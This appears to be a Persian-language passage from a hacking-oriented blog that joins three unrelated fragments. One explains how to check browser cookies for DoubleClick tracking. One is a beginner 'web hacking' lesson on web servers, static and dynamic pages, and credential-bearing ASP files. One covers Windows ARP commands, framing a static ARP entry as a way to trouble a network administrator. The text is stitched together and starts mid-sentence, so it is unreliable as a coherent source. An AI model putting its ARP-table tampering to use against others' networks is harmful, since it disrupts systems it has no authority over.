اعضا مانند پروفایل کاربران و میزان تاثیر تبلیغاتشان استفاده کند. برای اینکه بفهمید آیا توسط DoubleClick  ردگیری شده‌اید یا نه، کوکی‌های مرورگر خود را امتحان کنید و ببینید آیا چیزی شبیه به این:

ad.doubleclick.net FALSE / FALSE 942195440 IAA d2bbd5 در کوکی‌ها وجود دارد یا خیر.

وب هکينگ به نوعي از حملات نفوذگران اينترنتي گفته ميشود که در اون ميخوان به يک وب سرور دسترسي پيدا کنند. وب سرور نوعي از سرور ها ميباشد که از آن براي نگهداري و نمايش دادن صفحات وب استفاده ميشود . هر وب سروري مانند رايانه هاي ديگر داراي سيستم عامل است و يک نرمافزار مديريتي وب سرور را نيز دارا ميباشد اين ها ميتونند شامل زير باشند 

IIS,APACHE,TOMCAT

و امثال اينها خوب صفحاتي هم که وب سرور رو نمايش ميدن به دو دسته مختلف تقسيم ميشن که در زير گفتم

Dynamic , Static

صفحات استاتيک يا ثابت صفحاتي هستند که هميشه ثابت بوده و هيچ تغييري در آنها ايجاد نميشود به عنوان مثال صفحات ساده نوشته شده با اچ تي ام ال که البته در آنها از جاوا اسکريپت و اسکريپتهاي ديگري استفاده نشده نوعي از صفحات ثابت هستند 

صفحات ديناميک صفحاتي هستند که بر اساس نوع دادههاي وارد شده به آنها شکلهاي مختلفي به خود ميگيرند به عنوان مثال صفحاتي که با زبانهاي 

ASP , PHP , JSP 

و اسکريپتهاي جاوا اسکريپت نوشته شده اند از اين دسته اند و طرض اجراي صفحات نيز جاءز اهميت ميباشد بعضي از صفحات بايد در سمت کاربر يا همان يوزر پردازش و نمايش داده شود و گروهي ديگر در سمت سرور وسپس صفحه اي را مانند همون صفحه اول توليد ميکنن که در سمت کاربر پردازش ميشه 

از گروه اول ميتونم زبانهاي اچ تي ام ال و جاوا اسکريپت رو مثال بزنم و در گروه دوم هم زبانهاي زير 

ASP , PHP , JSP

هم قرار ميگيرند . پس با توجه به گفته هاي بالا و اين قسمت ميتونيم نتيجهبگيريم که اکثر صفحات ديناميک در سمت سرور پردازش ميشوند. علت اين امر چيست؟ شايد يکي از علل اصلي امنيت برنامه ها باشد زيرا به طور معمول سورس کد اين صفحات اطلاعات بسيار خوبي رو براي نفوذگر در خود دارند . براي اين مورد ميتونيم سيستم مديريت وبلاگ آسپ سوار رو نام ببريم که دو تا صفحه موجود در اون حاوي آدرس بانک اطلاعاتي و نام کاربري و پسوورد وبلاگ ميباشن ولي به علت اينکه اين صفحات به زبان آاس پي نوشته شده اند به سادگي نميتونيم به سورس کد اونها دسترسي پيدا کنيم خوب تا اينجا واسه اين درس بسه

نظر یادتون نره

Arp  -a كار اين دستور نمايش ليست آدرسهاي فيزيكي به همرا IP آدرس سيستم ها است توجه كنيد چنانچه هيچ آدرس فيزيكي در ليست شما وجود نداشته باشد پيغام زير ظاهر مي شود.

C:\> Arp -a
No ARP Entries Found

c:\> Arp -a
Interface: 0.0.0.0 on Interface 0x2
Internet Address Physical Address Type
static 192.168.1.1 00-22-66-88-77-55

Arp  -S  192.168.1.1 00-55-88-41-35-EAكار اين دستور به همراه اين سوئيچ(S) اين است كه شما يك آدرس IP را با يك آدرس فيزيكي به ليست آدرسهاي موجود درآن وارد مي كنيد. توجه كنيد كه هنگام وارد آدرس فيزيكي اشتباه با يد اين آدرس 6 بايت باشد يعني 12 عدد كه بصورت دو تايي آنها را از هم با خط فاصله جدا مي شوند.حال چنانچه دلتان بحال مسئول شبكه مي سوخت و مي خواستيد كه زياد اذيت نشه با دستور زير آنرا پاك كنيد.

 ARP  -d 192.168.1.1 :بايد در جلوي دستور پس از نوشتن d- آدرس IP  را كه مي خواهيد آدرس فيزيكي مربوط به آن پاك شود بايد نوشته شود